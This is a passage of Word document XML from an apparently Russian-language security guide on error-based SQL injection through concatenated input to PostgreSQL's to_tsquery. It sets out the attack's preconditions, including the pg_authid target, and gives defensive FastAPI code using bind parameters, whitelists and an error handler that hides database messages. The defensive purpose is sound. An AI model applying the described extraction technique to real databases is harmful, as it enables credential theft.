        </w:rPr>
        <w:t>HTTP 500</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>detail</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> = repr(exception). SQLAlchemy DBAPIError содержит исходный текст error message.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12ECCC70" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Сочетание этих трёх — error-based extraction-канал через любую concat-injection в текст, который попадает в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>to_tsquery</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216BAB1F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Защита — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>никакой concat в аргументах `to_tsquery`</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A909436" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># Безопасный шаблон: всё через bind, config — Literal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5792AE30" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>from typing import Literal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="313147B9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A994758" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@router.get("/search")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7552CB37" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>async def search(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="044AEB6E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    q: str = Query("", max_length=200),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4936848C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    config: Literal["english", "russian", "german"] = Query("english"),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B87C16E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3214793F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="567C2905" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # config через bind как regconfig</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="743E9B6D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    query = text("""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20DD930B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        SELECT id FROM articles</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5EDCF1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        WHERE search_vector @@ websearch_to_tsquery(:config::regconfig, :q)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="254F027D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    """)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="631F2F7A"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 {"config": config, "q": q})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6D52C2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Literal</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> гарантирует whitelist на уровне FastAPI; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:config::regconfig</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> cast делает PG-side validation (если bind value не существует как regconfig — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ERROR: text search configuration ... does not exist</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>без leaked subquery</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, потому что bind value никогда не evaluating-ся как expression). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>websearch_to_tsquery</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> устраняет syntax-error канал даже для invalid q.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="030CA47D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Дополнительная защита — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>error-handler middleware</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, который </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>не пересылает SQL-error в HTTP response</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="170EF1E1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># Глобальный handler — не leak Postgres error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33620D7F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@app.exception_handler(SQLAlchemyError)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53AC99ED" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>async def sqlalchemy_error_handler(request, exc):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F99FC4E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    logger.exception("Database error", exc_info=exc)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="717102B1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    return JSONResponse(status_code=500, content={"detail": "Internal server error"})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17812FA6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>defence-in-depth</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — даже если pattern injection попадёт через, error message не leaked клиенту.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="520DA3C8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Требования к среде.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70511D80" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Версия PG:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> все версии с tsquery (8.3+).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E59C47" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Привилегия атакующего:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> EXECUTE-доступ к эндпоинту + SELECT на target-tables (для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_authid</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — superuser).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA93578" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Драйвер:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> любой.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F75292B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Pre-condition в коде:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> user-controlled input через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>concatenation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в первом или втором аргументе </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>to_tsquery</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Bind-параметр </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:q</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> сам по себе </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>не уязвим</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — нужна именно concat-injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB911BE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Pre-condition в app</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: error message Postgres попадает в HTTP response body (DEBUG mode, default FastAPI exception handler, Spring </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>include-message=always</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02EA6591"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to_tsquery</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> с server-side built first argument (из validated config + validated tokens) — корректное использование. Concat для построения tsquery-string на стороне application допустимо </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>только</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> если все компоненты — validated tokens или whitelist values:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75472059" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># Шаблон: validated config + bind для query body</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B0EAC6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@router.get("/search")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="522B82D3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>async def search(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A46AAC6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    q: str = Query("", max_length=200),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34124AC4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    lang: Literal["english", "russian", "simple"] = Query("english"),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CCB1D11" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5726E32D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E61290" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # lang — Literal (whitelist), q — bind</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A62D04A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    query = text(f"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BDD86A5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        SELECT id, title FROM articles</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8320AA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        WHERE search_vector @@ websearch_to_tsquery('{lang}', :q)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D88E07D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    """)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3719073C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # f-string в lang безопасен потому что lang — Literal whitelist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56374AF5"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session.execute(query, {"q": q})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224381C1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Здесь </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lang</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> валидируется FastAPI Literal-проверкой до handler — payload-injection невозможна.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D5A068" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Признаки атаки:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="287780B6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
